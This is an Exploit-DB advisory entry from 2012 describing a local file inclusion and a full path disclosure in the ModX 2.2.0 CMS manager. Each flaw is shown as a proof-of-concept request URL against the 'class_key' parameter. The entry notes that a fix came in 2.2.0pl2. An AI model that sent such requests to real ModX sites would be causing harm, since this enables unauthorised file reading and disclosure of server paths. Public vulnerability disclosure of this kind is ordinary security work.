ModX 2.2.0 - Multiple Vulnerabilities

EDB-ID:

18593

CVE:



Author:

n0tch

Type:

webapps


Platform:

PHP

Date:

2012-03-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Modx 2.2.0 LFI and Full Path Disclosure
# Google Dork: [if relevant]  (we will automatically add these to the GHDB)
# Date: 13/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://modx.com/download/
# Version: 2.2.0
# Tested on:  Windows XP/ Windows 7 / Ubuntu


+[-- LFI --]+

http://localhost/cms/manager/?a=55&class_key=

** Filter added in 2.2.0pl2 **


+[-- FPD --]+

http://localhost/cms/manager/?a=55&class_key=somefilethatdoesntexsist

+[-- Shoutz --]+

All the belegit crew..